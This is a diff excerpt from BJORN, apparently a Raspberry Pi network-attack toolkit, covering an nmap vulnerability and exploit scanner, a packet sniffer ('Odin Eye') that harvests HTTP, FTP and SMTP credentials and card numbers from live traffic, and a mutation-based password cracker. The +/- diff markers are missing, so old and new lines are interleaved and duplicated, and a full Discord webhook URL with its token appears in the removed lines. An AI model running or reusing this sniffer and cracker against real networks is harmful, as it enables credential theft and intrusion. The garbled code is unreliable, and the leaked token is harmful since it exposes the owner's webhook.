# ---------------------------- Scanning (Batch Mode) ------------------------------ #
def scan_vulnerabilities(self, ip: str, ports: List[str]) -> List[Dict]:
"""Fast CPE/CVE mode or heavy fallback."""
fast = bool(self.shared_data.config.get('vuln_fast', True))
"""
Orchestrate the scan in batches so the progress bar
can be updated along the way.
"""
all_findings = []
fast = bool(self.shared_data.config.get('vuln_fast', True))
use_vulners = bool(self.shared_data.config.get('nse_vulners', False))
max_ports = int(self.shared_data.config.get('vuln_max_ports', 10 if fast else 20))
max_ports = int(self.shared_data.config.get('vuln_max_ports', 10 if fast else 20))
p_list = [str(p).split('/')[0] for p in ports if str(p).strip()]
port_list = ','.join(p_list[:max_ports]) if p_list else ''
# Pausing between batches matters on the Pi Zero to let the CPU breathe
batch_pause = float(self.shared_data.config.get('vuln_batch_pause', 0.5))
if not port_list:
logger.warning("No valid ports for scan")
# Reduced batch size by default (2 on the Pi Zero, configurable)
batch_size = int(self.shared_data.config.get('vuln_batch_size', 2))
target_ports = ports[:max_ports]
total = len(target_ports)
if total == 0:
return []
if fast:
return self._scan_fast_cpe_cve(ip, port_list, use_vulners)
else:
return self._scan_heavy(ip, port_list)
batches = [target_ports[i:i + batch_size] for i in range(0, total, batch_size)]
processed_count = 0
for batch in batches:
if self.shared_data.orchestrator_should_exit:
break
port_str = ','.join(batch)
# Update the UI before scanning this batch
pct = int((processed_count / total) * 100)
self.shared_data.bjorn_progress = f"{pct}%"
self.shared_data.comment_params = {
"ip": ip,
"progress": f"{processed_count}/{total} ports",
"current_batch": port_str
}
t0 = time.time()
# Scan the batch (local instantiation to avoid state corruption)
if fast:
batch_findings = self._scan_fast_cpe_cve(ip, port_str, use_vulners)
else:
batch_findings = self._scan_heavy(ip, port_str)
elapsed = time.time() - t0
logger.debug(f"Batch [{port_str}] scanned in {elapsed:.1f}s -> {len(batch_findings)} finding(s)")
all_findings.extend(batch_findings)
processed_count += len(batch)
# Post-batch update
pct = int((processed_count / total) * 100)
self.shared_data.bjorn_progress = f"{pct}%"
# CPU pause between batches (vital on the Pi Zero)
if batch_pause > 0 and processed_count < total:
time.sleep(batch_pause)
return all_findings
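The batch splitting and progress arithmetic used above, run standalone with sample ports:

```python
# Slice the port list into fixed-size batches, as scan_vulnerabilities does.
ports = ["22", "80", "443", "8080", "3306"]
batch_size = 2
batches = [ports[i:i + batch_size] for i in range(0, len(ports), batch_size)]
print(batches)  # [['22', '80'], ['443', '8080'], ['3306']]

# After two batches, the progress percentage shown in the UI:
processed = len(batches[0]) + len(batches[1])
print(f"{int(processed / len(ports) * 100)}%")  # 80%
```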
def _scan_fast_cpe_cve(self, ip: str, port_list: str, use_vulners: bool) -> List[Dict]:
"""Fast scan to retrieve CPEs and (optionally) CVEs via vulners."""
vulns: List[Dict] = []
nm = nmap.PortScanner() # Local instance: no shared state
args = "-sV --version-light -T4 --max-retries 1 --host-timeout 30s --script-timeout 10s"
# --version-light instead of --version-all: much faster on the Pi Zero
# --min-rate/--max-rate: avoids saturating CPU and network
args = (
"-sV --version-light -T4 "
"--max-retries 1 --host-timeout 60s --script-timeout 20s "
"--min-rate 50 --max-rate 100"
)
if use_vulners:
args += " --script vulners --script-args mincvss=0.0"
logger.info(f"[FAST] nmap {ip} -p {port_list} ({args})")
logger.debug(f"[FAST] nmap {ip} -p {port_list}")
try:
self.nm.scan(hosts=ip, ports=port_list, arguments=args)
nm.scan(hosts=ip, ports=port_list, arguments=args)
except Exception as e:
logger.error(f"Fast scan failed to start: {e}")
logger.error(f"Fast batch scan failed for {ip} [{port_list}]: {e}")
return vulns
if ip not in self.nm.all_hosts():
if ip not in nm.all_hosts():
return vulns
host = self.nm[ip]
host = nm[ip]
for proto in host.all_protocols():
for port in host[proto].keys():
port_info = host[proto][port]
service = port_info.get('name', '') or ''
# 1) CPE from -sV
cpe_values = self._extract_cpe_values(port_info)
for cpe in cpe_values:
# CPE
for cpe in self._extract_cpe_values(port_info):
vulns.append({
'port': port,
'service': service,
'vuln_id': f"CPE:{cpe}",
'script': 'service-detect',
'details': f"CPE detected: {cpe}"[:500]
'details': f"CPE: {cpe}"
})
# 2) CVE via the 'vulners' script (if enabled)
try:
# CVE via vulners
if use_vulners:
script_out = (port_info.get('script') or {}).get('vulners')
if script_out:
for cve in self.extract_cves(script_out):
@@ -218,97 +323,73 @@ class NmapVulnScanner:
'service': service,
'vuln_id': cve,
'script': 'vulners',
'details': str(script_out)[:500]
'details': str(script_out)[:200]
})
except Exception:
pass
return vulns
def _scan_heavy(self, ip: str, port_list: str) -> List[Dict]:
"""Older (slower) strategy using the vuln script category, etc."""
vulnerabilities: List[Dict] = []
nm = nmap.PortScanner() # Local instance
vuln_scripts = [
'vuln','exploit','http-vuln-*','smb-vuln-*',
'ssl-*','ssh-*','ftp-vuln-*','mysql-vuln-*',
'vuln', 'exploit', 'http-vuln-*', 'smb-vuln-*',
'ssl-*', 'ssh-*', 'ftp-vuln-*', 'mysql-vuln-*',
]
script_arg = ','.join(vuln_scripts)
# --min-rate/--max-rate so as not to saturate the Pi
args = (
f"-sV --script={script_arg} -T3 "
"--script-timeout 30s --min-rate 50 --max-rate 100"
)
args = f"-sV --script={script_arg} -T3 --script-timeout 20s"
logger.info(f"[HEAVY] nmap {ip} -p {port_list} ({args})")
logger.debug(f"[HEAVY] nmap {ip} -p {port_list}")
try:
self.nm.scan(hosts=ip, ports=port_list, arguments=args)
nm.scan(hosts=ip, ports=port_list, arguments=args)
except Exception as e:
logger.error(f"Heavy scan failed to start: {e}")
logger.error(f"Heavy batch scan failed for {ip} [{port_list}]: {e}")
return vulnerabilities
if ip in self.nm.all_hosts():
host = self.nm[ip]
discovered_ports: Set[str] = set()
if ip not in nm.all_hosts():
return vulnerabilities
for proto in host.all_protocols():
for port in host[proto].keys():
discovered_ports.add(str(port))
port_info = host[proto][port]
service = port_info.get('name', '') or ''
host = nm[ip]
discovered_ports_in_batch: set = set()
if 'script' in port_info:
for script_name, output in (port_info.get('script') or {}).items():
for cve in self.extract_cves(str(output)):
vulnerabilities.append({
'port': port,
'service': service,
'vuln_id': cve,
'script': script_name,
'details': str(output)[:500]
})
for proto in host.all_protocols():
for port in host[proto].keys():
discovered_ports_in_batch.add(str(port))
port_info = host[proto][port]
service = port_info.get('name', '') or ''
if bool(self.shared_data.config.get('scan_cpe', False)):
ports_for_cpe = list(discovered_ports) if discovered_ports else port_list.split(',')
cpes = self.scan_cpe(ip, ports_for_cpe[:10])
vulnerabilities.extend(cpes)
for script_name, output in (port_info.get('script') or {}).items():
for cve in self.extract_cves(str(output)):
vulnerabilities.append({
'port': port,
'service': service,
'vuln_id': cve,
'script': script_name,
'details': str(output)[:200]
})
# Optional CPE scan (on this batch)
if bool(self.shared_data.config.get('scan_cpe', False)):
ports_for_cpe = list(discovered_ports_in_batch)
if ports_for_cpe:
vulnerabilities.extend(self.scan_cpe(ip, ports_for_cpe))
return vulnerabilities
# ---------------------------- Helpers -------------------------------- #
    def _extract_cpe_values(self, port_info: Dict[str, Any]) -> List[str]:
        """Normalize every CPE format that python-nmap may return."""
        cpe = port_info.get('cpe')
        if not cpe:
            return []
        if isinstance(cpe, str):
            parts = [x.strip() for x in cpe.splitlines() if x.strip()]
            return parts or [cpe]
        if isinstance(cpe, (list, tuple, set)):
            return [str(x).strip() for x in cpe if str(x).strip()]
        try:
            return [str(cpe).strip()] if str(cpe).strip() else []
        except Exception:
            return []
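For reference, the normalization covers the three shapes python-nmap is known to return (newline-joined string, list/tuple/set, or a single scalar). A plain-function mirror of the method (illustrative sketch, not project code) shows the behavior:

```python
def extract_cpe_values(port_info):
    """Plain-function mirror of _extract_cpe_values, for illustration."""
    cpe = port_info.get('cpe')
    if not cpe:
        return []
    if isinstance(cpe, str):
        # python-nmap sometimes joins several CPEs with newlines
        parts = [x.strip() for x in cpe.splitlines() if x.strip()]
        return parts or [cpe]
    if isinstance(cpe, (list, tuple, set)):
        return [str(x).strip() for x in cpe if str(x).strip()]
    return [str(cpe).strip()] if str(cpe).strip() else []

print(extract_cpe_values({'cpe': 'cpe:/a:openbsd:openssh:8.4\ncpe:/o:linux:linux_kernel'}))
# → ['cpe:/a:openbsd:openssh:8.4', 'cpe:/o:linux:linux_kernel']
```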
    def extract_cves(self, text: str) -> List[str]:
        """Extract CVE identifiers from a blob of text."""
        import re
        if not text:
            return []
        cve_pattern = r'CVE-\d{4}-\d{4,7}'
        return re.findall(cve_pattern, str(text), re.IGNORECASE)
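A standalone sketch of the same extraction (the regex is copied from the method above; note that `re.findall` preserves the original casing of each match):

```python
import re

def extract_cves(text):
    """Pull CVE identifiers out of free-form scanner output."""
    if not text:
        return []
    return re.findall(r'CVE-\d{4}-\d{4,7}', str(text), re.IGNORECASE)

output = "VULNERABLE: cve-2021-44228 (Log4Shell); see also CVE-2017-0144."
print(extract_cves(output))  # → ['cve-2021-44228', 'CVE-2017-0144']
```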
    def scan_cpe(self, ip: str, ports: List[str]) -> List[Dict]:
        """(Heavy fallback) Detailed CPE scan, run only when requested."""
        cpe_vulns: List[Dict] = []
        nm = nmap.PortScanner()  # Local instance
        try:
            port_list = ','.join([str(p) for p in ports if str(p).strip()])
            if not port_list:
                return cpe_vulns
            # --version-light instead of --version-all (much faster)
            args = "-sV --version-light -T4 --max-retries 1 --host-timeout 45s"
            nm.scan(hosts=ip, ports=port_list, arguments=args)
            if ip in nm.all_hosts():
                host = nm[ip]
                for proto in host.all_protocols():
                    for port in host[proto].keys():
                        port_info = host[proto][port]
                        service = port_info.get('name', '') or ''
                        for cpe in self._extract_cpe_values(port_info):
                            cpe_vulns.append({
                                'port': port,
                                'service': service,
                                'vuln_id': f"CPE:{cpe}",
                                'script': 'version-scan',
                                'details': f"CPE: {cpe}"
                            })
        except Exception as e:
            logger.error(f"scan_cpe failed for {ip}: {e}")
        return cpe_vulns
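The `vuln_id` values emitted here wrap raw CPE 2.2 URIs of the form `cpe:/part:vendor:product:version`. Should downstream code ever need the individual fields, a hypothetical parser sketch (the field names follow the CPE 2.2 URI layout; this helper is not part of the project):

```python
def parse_cpe(cpe):
    """Split a CPE 2.2 URI like 'cpe:/a:apache:http_server:2.4.54' into fields."""
    body = cpe.split('/', 1)[1] if '/' in cpe else cpe
    fields = body.split(':')
    keys = ['part', 'vendor', 'product', 'version']
    # Missing trailing components become empty strings
    return {k: (fields[i] if i < len(fields) else '') for i, k in enumerate(keys)}

print(parse_cpe('cpe:/a:apache:http_server:2.4.54'))
# → {'part': 'a', 'vendor': 'apache', 'product': 'http_server', 'version': '2.4.54'}
```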
    # ---------------------------- Persistence ---------------------------- #
    def save_vulnerabilities(self, mac: str, ip: str, findings: List[Dict]):
        """Split CVEs and CPEs, update statuses, and record new findings."""
        # Fetch the hostname from the DB
        hostname = None
        try:
            host_row = self.shared_data.db.query_one(
                "SELECT hostnames FROM hosts WHERE mac_address=? LIMIT 1", (mac,)
            )
            if host_row and host_row.get('hostnames'):
                hostname = host_row['hostnames'].split(';')[0]
        except Exception:
            pass
        # Group findings by port
        findings_by_port: Dict[int, Dict] = {}
        for f in findings:
            port = int(f.get('port', 0) or 0)
            if port not in findings_by_port:
                findings_by_port[port] = {'cves': set(), 'cpes': set()}
            vid = str(f.get('vuln_id', ''))
            vid_upper = vid.upper()
            if vid_upper.startswith('CVE-'):
                findings_by_port[port]['cves'].add(vid)
            elif vid_upper.startswith('CPE:'):
                # Stored without the "CPE:" prefix
                findings_by_port[port]['cpes'].add(vid[4:])
        # 1) CVEs
        for port, data in findings_by_port.items():
            for cve in data['cves']:
                try:
                    self.shared_data.db.execute("""
                        INSERT INTO vulnerabilities(mac_address, ip, hostname, port, vuln_id, is_active, last_seen)
                        VALUES(?,?,?,?,?,1,CURRENT_TIMESTAMP)
                        ON CONFLICT(mac_address, vuln_id, port) DO UPDATE SET
                            is_active=1, last_seen=CURRENT_TIMESTAMP, ip=excluded.ip
                    """, (mac, ip, hostname, port, cve))
                except Exception as e:
                    logger.error(f"Save CVE err: {e}")
        # 2) CPEs
        for port, data in findings_by_port.items():
            for cpe in data['cpes']:
                try:
                    self.shared_data.db.add_detected_software(
                        mac_address=mac, cpe=cpe, ip=ip,
                        hostname=hostname, port=port
                    )
                except Exception as e:
                    logger.error(f"Save CPE err: {e}")
        logger.info(f"Saved vulnerabilities for {ip}: {len(findings)} findings")
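The `INSERT ... ON CONFLICT` upsert above relies on a unique index over `(mac_address, vuln_id, port)`. A minimal in-memory demonstration of the same pattern (the schema here is illustrative, not the project's real table):

```python
import sqlite3

con = sqlite3.connect(":memory:")
con.execute("""CREATE TABLE vulnerabilities(
    mac_address TEXT, port INTEGER, vuln_id TEXT,
    is_active INTEGER, seen_count INTEGER DEFAULT 1,
    UNIQUE(mac_address, vuln_id, port))""")

sql = """INSERT INTO vulnerabilities(mac_address, port, vuln_id, is_active)
         VALUES(?,?,?,1)
         ON CONFLICT(mac_address, vuln_id, port) DO UPDATE SET
             is_active=1, seen_count=seen_count+1"""
con.execute(sql, ("aa:bb", 443, "CVE-2021-44228"))
con.execute(sql, ("aa:bb", 443, "CVE-2021-44228"))  # same key: updates in place
rows = con.execute("SELECT COUNT(*), MAX(seen_count) FROM vulnerabilities").fetchone()
print(rows)  # → (1, 2)
```

The second execute hits the unique index and runs the `DO UPDATE` branch instead of creating a duplicate row (requires SQLite ≥ 3.24 for `ON CONFLICT ... DO UPDATE`).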

View File

@@ -1,110 +1,85 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
odin_eye.py -- Network traffic analyzer and credential hunter for BJORN.
Uses pyshark to capture and analyze packets in real-time.
"""
import os
import json
try:
    import psutil
except Exception:
    psutil = None
try:
    import pyshark
    HAS_PYSHARK = True
except ImportError:
    pyshark = None
    HAS_PYSHARK = False
import re
import threading
import time
import logging
from datetime import datetime
def _list_net_ifaces() -> list[str]:
    names = set()
    # 1) psutil if available
    if psutil:
        try:
            names.update(ifname for ifname in psutil.net_if_addrs().keys() if ifname != "lo")
        except Exception:
            pass
    # 2) kernel fallback
    try:
        for n in os.listdir("/sys/class/net"):
            if n and n != "lo":
                names.add(n)
    except Exception:
        pass
    out = ["auto"] + sorted(names)
    # safety: no duplicates
    seen, unique = set(), []
    for x in out:
        if x not in seen:
            unique.append(x)
            seen.add(x)
    return unique
from collections import defaultdict
from typing import Any, Dict, List, Optional
from logger import Logger
# Hook called by the backend before UI display / DB sync
def compute_dynamic_b_args(base: dict) -> dict:
    """
    Compute dynamic arguments at runtime.
    Called by the web interface to populate dropdowns, etc.
    """
    d = dict(base or {})
    # Dynamic interface list
    if "interface" in d:
        d["interface"]["choices"] = _list_net_ifaces()
    return d
logger = Logger(name="odin_eye.py")
# --- Additional UI metadata -------------------------------------------------
# Example arguments (shown in the frontend; also persisted to DB via sync_actions)
b_examples = [
    {"interface": "auto", "filter": "http or ftp", "timeout": 120, "max_packets": 5000, "save_credentials": True},
    {"interface": "wlan0", "filter": "(http or smtp) and not broadcast", "timeout": 300, "max_packets": 10000},
]
# Markdown link (can be a local path served by your frontend, or an http(s) URL)
# Example: a markdown README stored in your repo
b_docs_url = "docs/actions/OdinEye.md"
# -------------------- Action metadata --------------------
b_class = "OdinEye"
b_module = "odin_eye"
b_status = "odin_eye"
b_port = None
b_service = "[]"
b_trigger = "on_start"
b_parent = None
b_action = "normal"
b_priority = 30
b_cooldown = 0
b_rate_limit = None
b_timeout = 600
b_max_retries = 1
b_stealth_level = 4  # Capturing is passive, but pyshark can be resource intensive
b_risk_level = "low"
b_enabled = 1
b_tags = ["sniff", "pcap", "creds", "network"]
b_category = "recon"
b_name = "Odin Eye"
b_description = "Passive network analyzer that hunts for credentials and data patterns."
b_author = "Bjorn Team"
b_version = "2.0.1"
b_icon = "OdinEye.png"
# Argument schema for the dynamic UI (key == flag name without '--')
b_args = {
    "interface": {
        "type": "select",
        "label": "Network Interface",
        "choices": ["auto", "wlan0", "eth0"],
        "default": "auto",
        "help": "Interface to listen on."
    },
    "filter": {
        "type": "text",
        "label": "BPF Filter",
        "default": "(http or ftp or smtp or pop3 or imap or telnet) and not broadcast"
    },
    "max_packets": {
        "type": "number",
        "label": "Max packets",
        "min": 100,
        "max": 100000,
        "step": 100,
        "default": 1000
    },
    "save_creds": {
        "type": "checkbox",
        "label": "Save Credentials",
        "default": True
    }
}
CREDENTIAL_PATTERNS = {
'http': {
'username': [r'username=([^&]+)', r'user=([^&]+)', r'login=([^&]+)'],
@@ -120,297 +95,153 @@ CREDENTIAL_PATTERNS = {
}
class OdinEye:
    def __init__(self, shared_data):
        self.shared_data = shared_data
        self.capture = None
        self.stop_event = threading.Event()
        self.statistics = defaultdict(int)
        self.credentials: List[Dict[str, Any]] = []
        self.lock = threading.Lock()
    def process_packet(self, packet):
        """Analyze a single packet for patterns and credentials."""
        try:
            with self.lock:
                self.statistics['total_packets'] += 1
                if hasattr(packet, 'highest_layer'):
                    self.statistics[packet.highest_layer] += 1
            if hasattr(packet, 'tcp'):
                # HTTP
                if hasattr(packet, 'http'):
                    self._analyze_http(packet)
                # FTP
                elif hasattr(packet, 'ftp'):
                    self._analyze_ftp(packet)
                # SMTP
                elif hasattr(packet, 'smtp'):
                    self._analyze_smtp(packet)
                # Generic payload check
                if hasattr(packet.tcp, 'payload'):
                    self._analyze_payload(packet.tcp.payload)
        except Exception as e:
            logger.debug(f"Packet processing error: {e}")
    def _analyze_http(self, packet):
        if hasattr(packet.http, 'request_uri'):
            uri = packet.http.request_uri
            for field in ['username', 'password']:
                for pattern in CREDENTIAL_PATTERNS['http'][field]:
                    m = re.findall(pattern, uri, re.I)
                    if m:
                        self._add_cred('HTTP', field, m[0], getattr(packet.ip, 'src', 'unknown'))
    def _analyze_ftp(self, packet):
        if hasattr(packet.ftp, 'request_command'):
            cmd = packet.ftp.request_command.upper()
            if cmd in ['USER', 'PASS']:
                field = 'username' if cmd == 'USER' else 'password'
                self._add_cred('FTP', field, packet.ftp.request_arg, getattr(packet.ip, 'src', 'unknown'))
    def _analyze_smtp(self, packet):
        if hasattr(packet.smtp, 'command_line'):
            line = packet.smtp.command_line
            for pattern in CREDENTIAL_PATTERNS['smtp']['auth']:
                m = re.findall(pattern, line, re.I)
                if m:
                    self._add_cred('SMTP', 'auth', m[0], getattr(packet.ip, 'src', 'unknown'))
    def _analyze_payload(self, payload):
        patterns = {
            'email': r'[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}',
            'credit_card': r'\b\d{4}[- ]?\d{4}[- ]?\d{4}[- ]?\d{4}\b'
        }
        for name, pattern in patterns.items():
            m = re.findall(pattern, payload)
            if m:
                self.shared_data.log_milestone(b_class, "PatternFound", f"{name} detected in traffic")
    def _add_cred(self, proto, field, value, source):
        with self.lock:
            # Deduplicate on the stable fields only; including the fresh
            # timestamp in the comparison would defeat the check
            if any(c['protocol'] == proto and c['type'] == field and c['value'] == value
                   and c['source'] == source for c in self.credentials):
                return
            self.credentials.append({
                'protocol': proto,
                'type': field,
                'value': value,
                'timestamp': datetime.now().isoformat(),
                'source': source
            })
            logger.success(f"OdinEye: Credential found! [{proto}] {field}={value}")
            self.shared_data.log_milestone(b_class, "Credential", f"{proto} {field} captured")
    def execute(self, ip, port, row, status_key) -> str:
        """Standard entry point."""
        iface = getattr(self.shared_data, "odin_eye_interface", "auto")
        if iface == "auto":
            iface = None  # pyshark treats None as the default interface
        bpf_filter = getattr(self.shared_data, "odin_eye_filter", b_args["filter"]["default"])
        max_pkts = int(getattr(self.shared_data, "odin_eye_max_packets", 1000))
        timeout = int(getattr(self.shared_data, "odin_eye_timeout", 300))
        output_dir = getattr(self.shared_data, "odin_eye_output", "/home/bjorn/Bjorn/data/output/packets")
        logger.info(f"OdinEye: Starting capture on {iface or 'default'} (filter: {bpf_filter})")
        self.shared_data.log_milestone(b_class, "Startup", f"Sniffing on {iface or 'any'}")
        try:
            self.capture = pyshark.LiveCapture(interface=iface, bpf_filter=bpf_filter)
            start_time = time.time()
            packet_count = 0
            # Use sniff_continuously for real-time processing
            for packet in self.capture.sniff_continuously():
                if self.shared_data.orchestrator_should_exit:
                    break
                if time.time() - start_time > timeout:
                    logger.info("OdinEye: Timeout reached.")
                    break
                packet_count += 1
                if packet_count >= max_pkts:
                    logger.info("OdinEye: Max packets reached.")
                    break
                self.process_packet(packet)
                # Periodic progress update (every 50 packets)
                if packet_count % 50 == 0:
                    prog = int((packet_count / max_pkts) * 100)
                    self.shared_data.bjorn_progress = f"{prog}%"
                    self.shared_data.log_milestone(b_class, "Status", f"Captured {packet_count} packets")
        except Exception as e:
            logger.error(f"Capture error: {e}")
            self.shared_data.log_milestone(b_class, "Error", str(e))
            return "failed"
        finally:
            if self.capture:
                try:
                    self.capture.close()
                except Exception:
                    pass
            # Save results
            if self.credentials or self.statistics['total_packets'] > 0:
                os.makedirs(output_dir, exist_ok=True)
                ts = datetime.now().strftime("%Y%m%d_%H%M%S")
                with open(os.path.join(output_dir, f"odin_recon_{ts}.json"), 'w') as f:
                    json.dump({
                        "stats": dict(self.statistics),
                        "credentials": self.credentials
                    }, f, indent=4)
            self.shared_data.log_milestone(b_class, "Complete", f"Capture finished. {len(self.credentials)} creds found.")
        return "success"
"""
# action_template.py
# Example template for a Bjorn action with Neo launcher support
# UI Metadata
b_class = "MyAction"
b_module = "my_action"
b_enabled = 1
b_action = "normal" # normal, aggressive, stealth
b_description = "Description of what this action does"
# Arguments schema for UI
b_args = {
"target": {
"type": "text",
"label": "Target IP/Host",
"default": "192.168.1.1",
"placeholder": "Enter target",
"help": "The target to scan"
},
"port": {
"type": "number",
"label": "Port",
"default": 80,
"min": 1,
"max": 65535
},
"protocol": {
"type": "select",
"label": "Protocol",
"choices": ["tcp", "udp"],
"default": "tcp"
},
"verbose": {
"type": "checkbox",
"label": "Verbose output",
"default": False
},
"timeout": {
"type": "slider",
"label": "Timeout (seconds)",
"min": 10,
"max": 300,
"step": 10,
"default": 60
}
}
def compute_dynamic_b_args(base: dict) -> dict:
# Compute dynamic values at runtime
return base
import argparse
import sys
def main():
parser = argparse.ArgumentParser(description=b_description)
parser.add_argument('--target', default=b_args['target']['default'])
parser.add_argument('--port', type=int, default=b_args['port']['default'])
parser.add_argument('--protocol', choices=b_args['protocol']['choices'],
default=b_args['protocol']['default'])
parser.add_argument('--verbose', action='store_true')
parser.add_argument('--timeout', type=int, default=b_args['timeout']['default'])
args = parser.parse_args()
# Your action logic here
print(f"Starting action with target: {args.target}")
# ...
if __name__ == "__main__":
main()
"""
if __name__ == "__main__":
    from init_shared import shared_data
    eye = OdinEye(shared_data)
    eye.execute("0.0.0.0", None, {}, "odin_eye")

View File

@@ -10,7 +10,8 @@ PresenceJoin — Sends a Discord webhook when the targeted host JOINS the networ
import requests
from typing import Optional
import logging
import datetime
from logger import Logger
from shared import SharedData # only if executed directly for testing
@@ -29,19 +30,19 @@ b_rate_limit = None
b_trigger = "on_join" # <-- Host JOINED the network (OFF -> ON since last scan)
b_requires = {"any":[{"mac_is":"60:57:c8:51:63:fb"}]} # adapt as needed
# Replace with your webhook
DISCORD_WEBHOOK_URL = "https://discordapp.com/api/webhooks/1416433823456956561/MYc2mHuqgK_U8tA96fs2_-S1NVchPzGOzan9EgLr4i8yOQa-3xJ6Z-vMejVrpPfC3OfD"
DISCORD_WEBHOOK_URL = "" # Configure via shared_data or DB
class PresenceJoin:
def __init__(self, shared_data):
self.shared_data = shared_data
def _send(self, text: str) -> None:
url = getattr(self.shared_data, 'discord_webhook_url', None) or DISCORD_WEBHOOK_URL
if not url or "webhooks/" not in url:
logger.error("PresenceJoin: DISCORD_WEBHOOK_URL missing/invalid.")
return
try:
r = requests.post(url, json={"content": text}, timeout=6)
if r.status_code < 300:
logger.info("PresenceJoin: webhook sent.")
else:
@@ -61,7 +62,8 @@ class PresenceJoin:
ip_s = (ip or (row.get("IPs") or "").split(";")[0] or "").strip()
# Add timestamp in UTC
timestamp = datetime.datetime.now(datetime.timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")
msg = f"✅ **Presence detected**\n"
msg += f"- Host: {host or 'unknown'}\n"

View File

@@ -10,7 +10,8 @@ PresenceLeave — Sends a Discord webhook when the targeted host LEAVES the netw
import requests
from typing import Optional
import logging
import datetime
from logger import Logger
from shared import SharedData # only if executed directly for testing
@@ -30,19 +31,19 @@ b_trigger = "on_leave" # <-- Host LEFT the network (ON -> OFF since last
b_requires = {"any":[{"mac_is":"60:57:c8:51:63:fb"}]} # adapt as needed
b_enabled = 1
# Replace with your webhook (can reuse the same as PresenceJoin)
DISCORD_WEBHOOK_URL = "https://discordapp.com/api/webhooks/1416433823456956561/MYc2mHuqgK_U8tA96fs2_-S1NVchPzGOzan9EgLr4i8yOQa-3xJ6Z-vMejVrpPfC3OfD"
DISCORD_WEBHOOK_URL = "" # Configure via shared_data or DB
class PresenceLeave:
def __init__(self, shared_data):
self.shared_data = shared_data
def _send(self, text: str) -> None:
url = getattr(self.shared_data, 'discord_webhook_url', None) or DISCORD_WEBHOOK_URL
if not url or "webhooks/" not in url:
logger.error("PresenceLeave: DISCORD_WEBHOOK_URL missing/invalid.")
return
try:
r = requests.post(url, json={"content": text}, timeout=6)
if r.status_code < 300:
logger.info("PresenceLeave: webhook sent.")
else:
@@ -61,7 +62,8 @@ class PresenceLeave:
ip_s = (ip or (row.get("IPs") or "").split(";")[0] or "").strip()
# Add timestamp in UTC
timestamp = datetime.datetime.now(datetime.timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")
msg = f"❌ **Presence lost**\n"
msg += f"- Host: {host or 'unknown'}\n"

View File

@@ -1,35 +1,52 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
rune_cracker.py -- Advanced password cracker for BJORN.
Supports multiple hash formats and uses bruteforce_common for progress tracking.
Optimized for Pi Zero 2 (limited CPU/RAM).
"""
import os
import json
import hashlib
import itertools
import re
import threading
import time
from datetime import datetime
from concurrent.futures import ThreadPoolExecutor
from typing import Any, Dict, List, Optional, Set

from logger import Logger
from actions.bruteforce_common import ProgressTracker, merged_password_plan

logger = Logger(name="rune_cracker.py")
# -------------------- Action metadata --------------------
b_class = "RuneCracker"
b_module = "rune_cracker"
b_status = "rune_cracker"
b_port = None
b_service = "[]"
b_trigger = "on_start"
b_parent = None
b_action = "normal"
b_priority = 40
b_cooldown = 0
b_rate_limit = None
b_timeout = 600
b_max_retries = 1
b_stealth_level = 10 # Local cracking is stealthy
b_risk_level = "low"
b_enabled = 1
b_tags = ["crack", "hash", "bruteforce", "local"]
b_category = "exploitation"
b_name = "Rune Cracker"
b_description = "Advanced password cracker with mutation rules and progress tracking."
b_author = "Bjorn Team"
b_version = "2.1.0"
b_icon = "RuneCracker.png"
# Supported hash types and their patterns
HASH_PATTERNS = {
@@ -40,226 +57,153 @@ HASH_PATTERNS = {
'ntlm': r'^[a-fA-F0-9]{32}$'
}
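Auto-detection simply tries each pattern in order. A sketch with a subset of the patterns (the full dict is elided in this hunk; note that NTLM is also 32 hex characters, so length alone cannot distinguish it from MD5):

```python
import re

HASH_PATTERNS = {
    'md5': r'^[a-fA-F0-9]{32}$',
    'sha1': r'^[a-fA-F0-9]{40}$',
    'sha256': r'^[a-fA-F0-9]{64}$',
}

def detect_hash_type(h):
    """Return the first hash type whose pattern matches, or None."""
    for h_type, pattern in HASH_PATTERNS.items():
        if re.match(pattern, h):
            return h_type
    return None

print(detect_hash_type("5f4dcc3b5aa765d61d8327deb882cf99"))  # → md5
```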
class RuneCracker:
    def __init__(self, shared_data):
        self.shared_data = shared_data
        self.hashes: Set[str] = set()
        self.cracked: Dict[str, Dict[str, Any]] = {}
        self.lock = threading.Lock()
        self.hash_type: Optional[str] = None
        # Load mutation rules
        self.mutation_rules = self.load_rules()
        # Performance tuning for Pi Zero 2
        self.max_workers = int(getattr(shared_data, "rune_cracker_workers", 4))
    def load_hashes(self):
        """Load hashes from input file and validate format."""
        try:
            with open(self.input_file, 'r') as f:
                for line in f:
                    hash_value = line.strip()
                    if self.hash_type:
                        if re.match(HASH_PATTERNS[self.hash_type], hash_value):
                            self.hashes.add(hash_value)
                    else:
                        # Try to auto-detect hash type
                        for h_type, pattern in HASH_PATTERNS.items():
                            if re.match(pattern, hash_value):
                                self.hashes.add(hash_value)
                                break
            logger.info(f"Loaded {len(self.hashes)} valid hashes")
        except Exception as e:
            logger.error(f"Error loading hashes: {e}")

    def load_wordlist(self):
        """Load password wordlist."""
        if self.wordlist and os.path.exists(self.wordlist):
            with open(self.wordlist, 'r', errors='ignore') as f:
                return [line.strip() for line in f if line.strip()]
        return ['password', 'admin', '123456', 'qwerty', 'letmein']

    def load_rules(self):
        """Load mutation rules."""
        if self.rules and os.path.exists(self.rules):
            with open(self.rules, 'r') as f:
                return [line.strip() for line in f if line.strip() and not line.startswith('#')]
        return [
            'capitalize',
            'lowercase',
            'uppercase',
            'l33t',
            'append_numbers',
            'prepend_numbers',
            'toggle_case'
        ]
    def apply_mutations(self, word):
        """Apply various mutation rules to a word."""
        mutations = set([word])
        for rule in self.mutation_rules:
            if rule == 'capitalize':
                mutations.add(word.capitalize())
            elif rule == 'lowercase':
                mutations.add(word.lower())
            elif rule == 'uppercase':
                mutations.add(word.upper())
            elif rule == 'l33t':
                mutations.add(word.replace('a', '@').replace('e', '3').replace('i', '1')
                                  .replace('o', '0').replace('s', '5'))
            elif rule == 'append_numbers':
                mutations.update(word + str(n) for n in range(100))
            elif rule == 'prepend_numbers':
                mutations.update(str(n) + word for n in range(100))
            elif rule == 'toggle_case':
                mutations.add(''.join(c.upper() if i % 2 else c.lower()
                                      for i, c in enumerate(word)))
        return mutations
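For instance, the `'l33t'` substitution chain behaves as follows (standalone copy of the rule, for illustration):

```python
def l33t(word):
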